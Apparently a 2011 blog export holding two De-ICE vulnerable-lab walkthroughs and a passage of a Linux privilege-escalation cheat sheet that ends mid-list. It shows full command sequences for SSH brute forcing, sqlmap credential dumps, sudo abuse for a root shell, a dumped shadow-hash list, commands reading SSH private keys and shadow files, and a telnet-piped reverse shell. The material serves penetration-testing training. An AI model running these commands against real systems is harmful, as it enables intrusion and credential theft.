Forum Post: http://www.backtrack-linux.org/forums/backtrack-5-videos/43762-%5Bvideo%5D-kioptrix-level-3-a.html#post204586

~g0tmi1k

[Video] De-ICE.net v1.2b (1.20b) {Level 1 - Disk 3 - Version B}

2011-08-08T15:31:00.007+01:00

Links
Watch video on-line: http://blip.tv/g0tmi1k/de-ice-v1-2b-1-120-5443965
Download video: http://www.mediafire.com/?8gajaiu58f7rccd

Brief Overview

The "vulnerable-by-design" series De-ICE, has released another challenge. However, it's in two different parts - which makes the naming more confusing! This is De-ICE level 1-disk 3, the second half, and it should not be confused with "version a" (de-ice-1.120-1.0a.iso aka Level 1-Disk 3-Release 1-Version A), as these are NOT the same challenge - it's a completely independent challenge.
The students of "HackingDojo" produced their own exploitable LiveCD which was released under the de-ice name. This is it. To date all of Heorot.net releases (in date order) are as follows:

De-ICE - Level 1 - Disk 1 (de-ice.net-1.100-1.1.iso)
De-ICE - Level 1 - Disk 2 (de-ice.net-1.110-1.0.iso)
De-ICE - Level 2 - Disk 1 (de-ice.net-2.100-1.1.iso)
pWnOS (pWnOS v1.0.zip)
Hackerdemia (hackerdemia-1.1.0.iso)
De-ICE - Level 1 - Disk 3 - Version A (de-ice-1.120-1.0a.iso)
De-ICE - Level 1 - Disk 3 - Version B (de-ice-1.120-1.0b.iso)

Method

Pre-setup (configured IP as the host has a static IP in 192.168.1.0/24 range)
Scan network for the host (nmap)
Port scanned host (unicornscan)
Enumerated running services running open ports (nmap)
Enumerated possible username(s) (Netcat)
Brute forced login details (Hydra)
Profiled other users (CUPP)
Escalated privilege by re-creating custom encryption program (Java)
Found the "flag" (a database file)

What do I need?

de-ice-1.120-1.0b.iso (MD5: 5AFEA4D036681093408AE493D4BD2672)
Spare or a Virtual machine (Example: Virtual Box or VMware Player)
nmap – (Can be found on BackTrack 5).
unicornscan – (Can be found in BackTrack 5's repository).
hydra – (Can be found on BackTrack 5).
Common User Passwords Profiler – (Can be found on BackTrack 5).
Java compiler – (Can be found on BackTrack 5).

Walkthrough

By doing a quick "ping" scan with nmap, it reveals the live hosts on the network. Once the target has been discovered, a detailed port scan (TCP & UDP) was taken via unicornscan. The results were then checked with another detailed TCP port scan as well as enumerating which services are running by using nmap. Unicornscan is quicker doing a port scan (especially with UDP scanning). However, nmap has the upside of it being able to do more by "information gathering", for example "OS detection", "version detection of services", "a collection of script scanning" and "traceroute details" (by using "-a" option). The attacker also increases the scan speed (by "-T4"). Nmap also confirms TCP port 80 is open, which is being used for a web server (it's also the default port).

The attacker interacts with the web server and is presented with the "Company Portal" page. There is a message explaining that it the web site is "under maintenance", with methods of contact - a telephone number and email address.

The port scan revealed that there was a SMTP service running and decided to attempt to use the email address to identity possible usernames. The first method (VRFY) was disabled, so the attacker proceeds to draft an email. Depending on the recipient's name it will return if the account is valid or not. The attacker then tries different combinations of the given email address (CustomerServiceAdmin@nosecbank.com) until they find its valid login, csadmin.

The attacker then searches for a wordlist to aid them in attempting to brute force the password. (Editor's note: darkc0de.lst does contain the password. however it would of taken a lot longer for it to reach it). The attacker starts hydra attacking the SSH service and waits for it to try every entry in the file. After waiting a couple of minutes (due to the small size of the wordlist) the attacker found the valid password, 'rocker'.

Upon logging into the system remotely, the attacker finds if there are any other valid users in the system (the result is 4). The attacker then continues on by browsing the users (csadmin) personal folder. The attacker soon discovers a personal email conversation between the staff members. These emails contain personal information regarding each user - which is also commonly used as their password.

After building up the profile for each user, the attacker then generates possible passwords using this information, by using CUPP (Common User Passwords Profiler). The attacker enters in the collected information and waits for the possible combinations to be generated. They then repeat the brute force attempt, this time with a specific wordlist, tailor made for that user. This quickly found the user (sdadmin) password (his child's name and year of birth - donovin1998).

The attacker logs in with the new credentials and views his personal files and soon discovers a reply to the email, which contains more personal information regarding another staff member (as well as negative feeling towards them!). The whole process is then repeated again for the new user (dbadmin), who also used personal information for his password (nickname and a few numbers at the end-databaser60).

When the attacker logs in once again, they soon find the first part to an email which has been in every user account so far. Then contents of the email has been "corrupted", however, the header file of the message is still in contact. The subject of the message implies the purpose of it, "New Custom Encryption for Passwords". The attacker then extracts the printable characters, which shows the beginning of the possible source code.

The attacker then builds up the code, from the three found parts so far, which has been written in java and the function of it was the generation function for the new passwords policy. There are comments left in the code, saying it has already been used on two accounts (sysadmin and root). The attacker then fixes, cleans and adds the code (input & conversion functions).

Once the program was complete, the attacker runs it to generate the passwords for sysadmin and the root account. They then test the passwords by logging into the system as sysadmin and then switching to the super user account, root.

The attacker now has access to the complete system...

Game over

...and choose to explore. They find a message, left in the sysadmin home folder, explaining that the user account file has been updated, encrypted and moved. The attacker then locates this file, and by trying all the encryption algorithms with the super user's password, they were able to decrypt the file and view the content in plain text - revealing customers' details, such as names, email addresses, usernames, passwords and more!

Game over...again

Commands

ifconfig eth0

ifconfig eth0 192.168.1.192

ifconfig eth0

nmap 192.168.1.* -n -sn -sP

us -H -msf -Iv 192.168.1.20 -p 1-65535 && us -H -mU -Iv 192.168.1.20 -p 1-65535

nmap -p 1-65535 -T4 -A -v 192.168.1.20

firefox 192.168.1.20    # customerserviceadmin@nosecbank.com

nc -v 192.168.1.20 25

HELO attacker

VRFY customerserviceadmin

mail from: attacker@slax.example.net

rcpt to: customerserviceadmin

rcpt to: csadmin

quit

wc -l /pentest/passwords/wordlists/darkc0de.lst

find / -name password.lst

wc -l /opt/framework3/msf3/data/john/wordlists/password.lst

hydra -l csadmin -P /opt/framework3/msf3/data/john/wordlists/password.lst -e ns -f 192.168.1.20 ssh 2>/dev/null | tee /tmp/output

ssh csadmin@192.168.1.20   # rocker

id

cat /etc/passwd   # sysadmin, dbadmin, sdadmin, csadmin

pwd

ls -lah

cd mailserv_download/

ls -lah

cat * | less    # @nosecbank.com, sdadmin (Paul, Donovin, 21 Dec 1998), csadmin (Mark, Andy)

exit

cd /pentest/passwords/cupp/

python cupp.py -i   # Paul, Donovin, 22121998, nosecbank

hydra -l sdadmin -P paul.txt -e ns -f 192.168.1.20 ssh 2>/dev/null | tee -a /tmp/output

ssh sdadmin@192.168.1.20   # donovin1998

id

pwd

ls -lah

cd mailserv_download/

ls -lah

cat * | less    # dbadmin (Fred, databaser)

exit

python cupp.py -i   # Fred, databaser, nosecbank

hydra -l dbadmin -P fred.txt -e ns -f 192.168.1.20 ssh 2>/dev/null | tee -a /tmp/output

ssh dbadmin@192.168.1.20   # databaser60

id

pwd

ls -lah

cd mailserv_download/

ls -lah

cat * | less   # sysadmin, New Custom Encryption for Passwords

umask 002

strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part1 | cut -f2- |  sed 's/[ \t]*//' |  sed -n '/^[0-9]*\t/p' > /tmp/output

su csadmin   # rocker

strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part2 | cut -f2- |  sed 's/[ \t]*//' |  sed -n '/^[0-9]*\t/p' >> /tmp/output

su sdadmin   # donovin1998

strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part3 | cut -f2- |  sed 's/[ \t]*//' |  sed -n '/^[0-9]*\t/p' >> /tmp/output

cat /tmp/output | sort -g

cat /tmp/output | sort -g | cut -f2-

exit

exit

exit

geany deice.java

less deice.java

javac deice.java

java deice    # sysadmin - 531/{{tor/rv/A

java deice    # root - 31/Fwxw+2

ssh sysadmin@192.168.1.20   # 7531/{{tor/rv/A

id

su -    # 31/Fwxw+2

id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lAh ~/

pwd

exit

pwd

ls

cat Note_to_self

ls -lAhR /home

cd /home/ftp/incoming/

ls -l

openssl -h

openssl enc -in useracc_update.csv.enc -out useracc_update.csv -d -aes-256-cbc -k "31/Fwxw+2"

su -c 'openssl enc -in useracc_update.csv.enc -out useracc_update.csv -d -aes-256-cbc -k "31/Fwxw+2"'   # 31/Fwxw+2

ls -l

cat useracc_update.csv

deice.java

import java.io.*;

//import java.util.Arrays;



public class deice

{

 public static void main(String[] args)

 {

    try

    {

       System.out.println("[>] De-ICE.net v1.2b (1.20b) Password Generator");



       BufferedReader in=new BufferedReader(new InputStreamReader(System.in));

       System.out.print("[?] Username: ");

       String input=in.readLine();



       int[] output=processLoop(input);

       //System.out.println("[+] Output: "+Arrays.toString(output));



       String outputASCII="";

       for(int i=0;i<output.length;i++) outputASCII+=(char) output[i];

       System.out.println("[>] Password: "+outputASCII);



    }

    catch(IOException e)

    {

       System.out.println("[-] IO Error!");

    }

 }



 /*input is username of account*/

 public static int[] processLoop(String input){

    int strL=input.length();

    int lChar=(int)input.charAt(strL-1);

    int fChar=(int)input.charAt(0);

    int[] encArr=new int[strL+2];

    encArr[0]=(int)lChar;



    for(int i=1;i<strL+1;i++) encArr[i]=(int)input.charAt(i-1);



    encArr[encArr.length-1]=(int)fChar;

    encArr=backLoop(encArr);

    encArr=loopBack(encArr);

    encArr=loopProcess(encArr);

    int j=encArr.length-1;



    for(int i=0;i<encArr.length;i++){

       if(i==j) break;

       int t=encArr[i];

       encArr[i]=encArr[j];

       encArr[j]=t;

       j--;

    }

    return encArr;

 }



 /*Note the pseudocode will be implemented with the

 root account and my account, we still need to implement it with the csadmin, sdadmin,

 and dbadmin accounts though*/

 public static int[] backLoop(int[] input){

    int ref=input.length;

    int a=input[1];

    int b=input[ref-1];

    int ch=(a+b)/2;



    for(int i=0;i<ref;i++){

       if(i%2==0) input[i]=(input[i]%ch)+(ref+i);

       else input[i]=(input[i]+ref+i);

    }

    return input;

 }



 public static int[] loopBack(int[] input){

    int ref=input.length/2;

    int[] encNew=new int[input.length+ref];

    int ch=0;



    for(int i=(ref/2);i<input.length;i++){

       encNew[i]=input[ch];

       ch++;

    }



    for(int i=0;i<encNew.length;i++){

       if(encNew[i]<=33) encNew[i]=33+(++ref*2);

       else if(encNew[i]>=126) encNew[i]=126-(--ref*2);

       else{

          if(i%2==0) encNew[i]-=(i%3);

          else encNew[i]+=(i%2);

       }

    }

    return encNew;

 }



 public static int[] loopProcess(int[] input){

    for(int i=0;i<input.length;i++){

       if(input[i]==40||input[i]==41) input[i]+=input.length;

       else if(input[i]==45) input[i]+=20+i;

    }

    return input;

 }

}

Notes

De-ICE.net v1.2b has a static IP address of 192.168.1.20. Make sure you're on the same subnet as it!
The wordlist used (part of the metasploit framework) to brute force csadmin, might have been updated since - You may have to use another wordlist.
I made a couple of mistakes in the video (For example: nosec instead of nosecbank) - it's worth checking the commands subsection!

Song: Electronic Sympathies - Shanti & Punk (Radio Edit) - Ferry Corsten
Video length: 10:48
Capture length: 40:01
Blog Post: http://g0tmi1k.blogspot.com/2011/08/video-de-icenet-v12b-120b-level-1-disk.html
Forum Post: http://forums.heorot.net/viewtopic.php?f=16&t=507 & http://www.backtrack-linux.org/forums/backtrack-5-videos/43651-%5Bvideo%5D-de-ice-net-v1-2b-1-20b-%7Blevel-1-disk-3-version-b%7D.html#post204395

~g0tmi1k

[Video] De-ICE.net v1.2a (1.20a) {Level 1 - Disk 3 - Version A}

2011-08-03T00:13:00.014+01:00

Links
Watch video on-line: http://blip.tv/g0tmi1k/de-ice-v1-2a-1-120-5434302
Download video: http://www.mediafire.com/?8sgsv5qwtbbnyim

Brief Overview

De-ICE has another challenge in its "vulnerable-by-design" series - even though the naming gets more confusing with every release! It's been a while since the last release, level 2-disk 1 (back in 2007). The students of "HackingDojo" were challenged to put together their own exploitable LiveCD, and it was released under the de-ice name. This is "version a", and should be not confused with "version B" (de-ice-1.120-1.0b.iso aka Level 1-Disk 3-Release 1-Version B), as these are NOT the same challenge - it's a different setup.

Heorot.net release's (in date order):

De-ICE - Level 1 - Disk 1 (de-ice.net-1.100-1.1.iso)
De-ICE - Level 1 - Disk 2 (de-ice.net-1.110-1.0.iso)
De-ICE - Level 2 - Disk 1 (de-ice.net-2.100-1.1.iso)
pWnOS (pWnOS v1.0.zip)
Hackerdemia (hackerdemia-1.1.0.iso)
De-ICE - Level 1 - Disk 3 - Version A (de-ice-1.120-1.0a.iso)
De-ICE - Level 1 - Disk 3 - Version B (de-ice-1.120-1.0b.iso)

Method

Pre-setup (configured IP as the host has a static IP in 192.168.1.0/24 range)
Scan network for the host (nmap)
Port scanned host (unicornscan)
Enumerated running services running open ports (nmap)
Discovered a SQL Injection (Firefox)
Dump all usernames & passwords to the database (sqlmap)
Tested for any repeated logins with known usernames & working passwords (hydra)
Escalated privilege by incorrectly configured settings (sudo)

What do I need?

de-ice-1.120-1.0a.iso (MD5: E8FB66760ADDF85896DB3F78F278F7D2)
Spare or a Virtual machine (Example: Virtual Box or VMware Player)
nmap – (Can be found on BackTrack 5).
unicornscan – (Can be found in BackTrack 5 repository).
sqlmap – (Can be found on BackTrack 5).
hydra – (Can be found on BackTrack 5).

Walkthrough

A quick "ping" scan with nmap, shows which hosts are connected to the network. Once the target had been discovered a detailed port scan (TCP & UDP) was taken by using unicornscan. To check the results another detailed TCP port scan was done, though this time it was done using nmap. Unicornscan uses a lot less time to do a port scan compared to nmap (especially with UDP scanning). However, nmap has the advantage of being able to do more than just "port scanning" by "information gathering". The attacker uses the "-a" option, which allows for "OS detection", "version detection of services", "a collection of script scanning", and "traceroute details" as well as increasing the scan speed by "-T4". nmap also confirms TCP port 80 is open, which is the default port for a web server, as well as detecting basic information regarding the configuration of the server.

The attacker then interacts with the web server and is presented with a "Data Entry" site. There isn't any protection on the server, which allows for the attacker to add a new product into the system. Upon doing so, the attacker notices the URI of the current page, "products.php?id=1". By using the ID variable, the server selects the requested item. The attacker tries to inject their own code allowed with it.

The attacker uses sqlmap to speed up the injection process as it is designed to test multiple injection methods. sqlmap has pre-built commands which allows the attacker to find common sensitive information (such as; the running services and versions, current user and the database admin, user privileges as well as viewing every table along with the contents). The attacker chooses to capture all the users and their passwords to the database services. The passwords used in the database are encrypted, however, they use a well-known scheme which is easily cracked. The result of this, gives the attacker 50 working usernames as well as 49 known passwords too.

The attacker then checks to see if any of the users have reused their passwords (or if they have used someone else known password, any blank passwords or their usernames as the passwords), by brute forcing the SSH remote login. The result of this action, gives the attacker remote access to the system with 50 credentials.

On the list of credentials, the attacker notices a few usernames which they have seen before from previous pentests for the company. The attacker then logs into their accounts and views their personal folders. Upon accessing "ccoffee" account, there was a directory (scripts) located inside. In this folder, there was a file which was only accessible to the super user account, root. The attacker then checks to see if any privileges have been assigned to the user for this file-they have been. The attacker then backups the file and replaces it with their own file - which is a shell prompt.

The attacker highlights the fact that the full path has to be specified for sudo to allow access to the file. After this command has been executed, the attacker now has complete access to the system. The attacker collects a bit of information about the system (IP addresses, user hashes and accesses the personal folder for the root account).

As the attacker now has access to the complete system, they access every user folder at once and view random files at their choosing; a selection of them are sensitive to the company. (Note: I skipped the majority of them out for two reasons: 1.) It's boring watching me cat'ing them all and 2.) It allows you to view them for yourselves).

Game over

Commands

ifconfig eth0

ifconfig eth0 192.168.1.59

ifconfig eth0

nmap 192.168.1.* -n -sn -sP

us -H -msf -Iv 192.168.1.120 -p 1-65535 && us -H -mU -Iv 192.168.1.120 -p 1-65535

nmap -p 1-65535 -T4 -A -v 192.168.13.120

firefox 192.168.1.120    # Add new product -> view product

cd /pentest/database/sqlmap

./sqlmap.py -u "http://192.168.1.120/products.php?id=1" -f -b --current-user --is-dba --is-dba --privileges --dbs --dump

./sqlmap.py -u "http://192.168.1.120/products.php?id=1" --users --passwords

cd output/192.168.1.120/

ll

grep -i administrator log

grep -i localhost log | grep -v : | sort | uniq

grep -i localhost log | grep -v : | sort | uniq | sed "s/\[\*\] '//" | sed  "s/'@'localhost'//" > /tmp/users

grep "clear-text" log | sort | uniq

grep "clear-text" log | sort | uniq | sed "s/    clear-text password: //" > /tmp/passwords

wc -l /tmp/users

hydra -L /tmp/users -P /tmp/passwords -e ns 192.168.1.120 ssh 2>/dev/null | tee /tmp/output

#medusa -h 192.168.1.120 -U /tmp/users -P /tmp/passwords -O /tmp/output -e ns -M ssh

ssh ccoffee@192.168.1.120

ls

cd scripts

ls -lah

sudo -l

cat getlogs.sh

mv getlogs.sh getlogs.bkup

echo "/bin/sh" > getlogs.sh

cat getlogs.sh

chmod +x getlogs.sh

ls -l

./getlogs.sh

id

exit

sudo getlogs.sh

sudo /home/ccoffee/scripts/getlogs.sh

id

id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lah /root/

ls -lAhR /home

#cat /home/aallen/gravy.txt

cat /home/aspears/hbkae

cat /home/bbanter/notes

cat /home/cchisholm/reminders.text

cat /home/ccoffee/DONOTFORGET

#cat /home/hlovell/creepy.doc

cat /home/jalvarez/draft

cat /home/jdavenport/company_address.txt

#cat /home/jdavenport/svrc.txt

cat /home/jduff/todo.txt

#cat /home/krenfro/list

cat /home/ktso/personnel.doc

#cat /home/kwebber/list

#cat /home/lmartinez/favorite.txt

#cat /home/mnader/layout

cat /home/rpatel/schedule

#---------------------------------------------------------------------  

root:$1$WfY1CvwB$D.6haP5soPp6vEQg9bhPg0:15188:0:::::

amaynard:$1$c210ErwB$HrzQkYAHwfvelkTRlzpLg/:15188:0:99999:7:::

cchisholm:$1$U160JrwB$.dduNMEgO7dV6lKk1dxxh1:15188:0:99999:7:::

myajima:$1$xk70OrwB$zSNMbpCceMK5yCLyRNlKw0:15188:0:99999:7:::

jdavenport:$1$n8Z1EvwB$Onfu58cxo0iHlkZrWFr46.:15188:0:99999:7:::

aadams:$1$E8B0YrwB$B2uCDepzXuvTY5NLL7GH6.:15188:0:99999:7:::

mbryan:$1$qqC0drwB$1R542ZRYEG3mfwe/GVSx.0:15188:0:99999:7:::

rpatel:$1$siE0irwB$nOgG/5tdhJxe.//y2XilL1:15188:0:99999:7:::

dcooper:$1$WhG0nrwB$W9sKEbkXNj1tkPVaZFBsj.:15188:0:99999:7:::

hlovell:$1$NXI0srwB$Z0bYLrdonKdxhd47XkIpQ/:15188:0:99999:7:::

jbresnahan:$1$ZYK0xrwB$npR5VIJXTLerRta1SRit..:15188:0:99999:7:::

aspears:$1$CJM00swB$5Yz1Jr5aCNh9cIaYnmF1A1:15188:0:99999:7:::

lmorales:$1$U1O05swB$r8jHStK1gi8uCIxf9UtF8/:15188:0:99999:7:::

dtraylor:$1$wpP0AswB$pMD7MsDlceIi3vyF7RUF31:15188:0:99999:7:::

jalcantar:$1$VaR0FswB$TcnOVJoUWDmy9lNkDaTKE/:15188:0:99999:7:::

rdominguez:$1$FLT0KswB$D3Hx32b9ulgcs0xGys6HP/:15188:0:99999:7:::

sjohnson:$1$O8V0PswB$Bx8EQjfZfvT/KRn3qFWYu/:15188:0:99999:7:::

rjacobson:$1$puW0UswB$F/Qy2cfcfeqdgLAGBXSNZ0:15188:0:99999:7:::

kwebber:$1$fcY0ZswB$g/goHdSqR9rKhdIfQcQZi/:15188:0:99999:7:::

dgilfillan:$1$hLa0eswB$kmZ/dj.nm4P1HItNDpEoe.:15188:0:99999:7:::

strammel:$1$.6c0jswB$56FUjoDRsFnVJpbv8UXOJ/:15188:0:99999:7:::

mholland:$1$msd0oswB$WLahBe77iUN5mMUfXjOtG/:15188:0:99999:7:::

lmartinez:$1$Idf0tswB$1p5EH/82vJ531K8CigEDD0:15188:0:99999:7:::

djohnson:$1$BNh0yswB$p4GCj50pY6KJdN3sDunal1:15188:0:99999:7:::

bbanter:$1$S7j01twB$yZY6jCAbzXRJnknNWgLVX.:15188:0:99999:7:::

aweiland:$1$G7l06twB$yWY3A2dFzDO/d2ODwefak0:15188:0:99999:7:::

mrodriguez:$1$o7n0BtwB$/uDQNVKIaDW45rw6cmU5g1:15188:0:99999:7:::

aallen:$1$xwo0GtwB$w4x/cSueMFa0K6ovawGZx1:15188:0:99999:7:::

jduff:$1$Jgq0LtwB$UfPTHRhQcOZt4vMIIFCmw0:15188:0:99999:7:::

aard:$1$0Qs0QtwB$F7VGVjAV7.sqUTBJHGeJy.:15188:0:99999:7:::

aharp:$1$BBu0VtwB$x58Fzy1fkJw8Hu6FKdC9W0:15188:0:99999:7:::

jfranklin:$1$nxv0atwB$dIMl2raRhaQ1S5pDuVjmP1:15188:0:99999:7:::

swarren:$1$4qx0ftwB$lGa9mO0/1G3S.bF6XsLSN.:15188:0:99999:7:::

tdeleon:$1$Udz0ktwB$iL4AdscPHskPHLuPs5cck1:15188:0:99999:7:::

sgains:$1$ih/1ptwB$zsOwb38f1LBlxLhsErxtM0:15188:0:99999:7:::

tgoodchap:$1$jc11utwB$zjQqR/O8JF0dx44pJLnje1:15188:0:99999:7:::

aheflin:$1$wh31ztwB$avbU3tAf5bk0yrcfP3Omu.:15188:0:99999:7:::

dwestling:$1$8c512uwB$qLDe0mMh5f0cmScixHB1e1:15188:0:99999:7:::

jayala:$1$fP717uwB$Jj1hhFl/5x40TGT5OOMPg1:15188:0:99999:7:::

mnader:$1$hH91CuwB$9FGdKfQko1xgp23m.ABrf0:15188:0:99999:7:::

dstevens:$1$z6B1HuwB$GyOErF9l.8K7b6ninqm8S0:15188:0:99999:7:::

jalvarez:$1$quC1MuwB$xAuD2ON9fw4M0RWk1gNix/:15188:0:99999:7:::

ccoffee:$1$3hE1RuwB$81Zlxr6VE0Dq3Zle4uMZF.:15188:0:99999:7:::

krenfro:$1$7UG1WuwB$ZOq7HpWqaGJCOwJZeX2QJ.:15188:0:99999:7:::

kclemons:$1$aII1buwB$AHP4eKOECYAidCxLsYrEK.:15188:0:99999:7:::

qpowers:$1$S7K1guwB$DgvYQxyTjva0jltWiLHQ90:15188:0:99999:7:::

dgrant:$1$1xL1luwB$D4wXwL6w4kzbrbpNTXqIt0:15188:0:99999:7:::

ktso:$1$v1O1quwB$q8iGtRe5e5NGSdM73tDVG0:15188:0:99999:7:::

bphillips:$1$6zP1vuwB$.DuK.K04CdMBRx1V.psUJ1:15188:0:99999:7:::

bwatkins:$1$QqR1.vwB$stF2i6wHmcta94eCYsztf.:15188:0:99999:7:::

#---------------------------------------------------------------------

Notes

De-ICE.net v1.2a has a static IP address of 192.168.1.120. Make sure you are on the same subnet as it!
When booting De-ICE it will randomly assign the passwords to the usernames - so it's different each time!
Each time you start De-ICE.net v1.2a it will generate fresh SSH keys - so it's different each time!
I made a couple of mistakes in the video (For example: /devnull) - it's worth checking the commands subsection!

Song: Crazy World (Extended Mix) - J Majik & Wickaman & Ill Behaviour - Danny Byrd Featuring I-Kay
Video length: 07:40
Capture length: 29:31
Blog Post: http://g0tmi1k.blogspot.com/2011/08/video-de-icenet-v12a-120a-level-1-disk.html
Forum Post: http://forums.heorot.net/viewtopic.php?f=16&t=506&p=2388#p2388 & http://www.backtrack-linux.org/forums/backtrack-5-videos/43650-%5Bvideo%5D-de-ice-net-v1-2a-1-20a-%7Blevel-1-disk-3-version-%7D.html#post204394

~g0tmi1k

Basic Linux Privilege Escalation

2011-08-02T01:02:00.012+01:00

Before starting, I would like to point out - I'm no expert. As far as I know, there isn't a "magic" answer, in this huge area. This is simply my finding, typed up, to be shared (my starting point). Below is a mixture of commands to do the same thing, to look at things in a different place or just a different light. I know there more "things" to look for. It's just a basic & rough guide. Not every command will work for each system as Linux varies so much. "It" will not jump off the screen - you've to hunt for that "little thing" as "the devil is in the detail".

Enumeration is the key.
(Linux) privilege escalation is all about:

Collect - Enumeration, more enumeration and some more enumeration.
Process - Sort through data, analyse and prioritisation.
Search - Know what to search for and where to find the exploit code.
Adapt - Customize the exploit, so it fits. Not every exploit work for every system "out of the box".
Try - Get ready for (lots of) trial and error.

Operating System
What's the distribution type? What version?
cat /etc/issue
cat /etc/*-release
   cat /etc/lsb-release
   cat /etc/redhat-release

What's the Kernel version? Is it 64-bit?
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-

What can be learnt from the environmental variables?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Is there a printer?
lpstat -a

Applications & Services
What services are running? Which service has which user privilege?
ps aux
ps -ef
top
cat /etc/service

Which service(s) are been running by root? Of these services, which are vulnerable - it's worth a double check!
ps aux | grep root
ps -ef | grep root

What applications are installed? What version are they? Are they currently running?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/

Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/

What jobs are scheduled?
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla

Communications & Networking
What NIC(s) does the system have? Is it connected to another network?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname

What other users & hosts are communicating with the system?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w

Whats cached? IP and/or MAC addresses
arp -e
route
/sbin/route -nee

Is packet sniffing possible? What can be seen? Listen to live traffic
# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21

Have you got a shell? Can you interact with the system?
# http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
nc -lvp 4444    # Attacker. Input (Commands)
nc -lvp 4445    # Attacker. Ouput (Results)
telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445    # On the targets system. Use the attackers IP!

Is port forwarding possible? Redirect and interact with traffic from another view
# rinetd
# http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch

# fpipe
# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7    # Local Port
ssh -R 8080:127.0.0.1:80 root@192.168.1.7    # Remote Port

# mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe    # Port Relay
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080)
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe    # Proxy monitor (Port 80 to 8080)

Is tunnelling possible? Send commands locally, remotely
ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig

Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
id
who
w
last
cat /etc/passwd | cut -d:    # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users
cat /etc/sudoers
sudo -l

What sensitive files can be found?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/

Anything "interesting" in the home directorie(s)? If it's possible to access
ls -ahlR /root/
ls -ahlR /home/

Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg

What has the user being doing? Is there any password in plain text? What have they been edting?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

What user information can be found?
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root

Can private-key information be found?
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key

File Systems
Which configuration files can be written in /etc/? Able to reconfigure a service?
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null     # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null    # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null    # Other

find /etc/ -readable -type f 2>/dev/null                         # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone

What can be found in /var/ ?
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases

Any settings/files (hidden) on website? Any settings file with database information?
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/

Is there anything in the log file(s) (Could help with "Local File Includes"!)
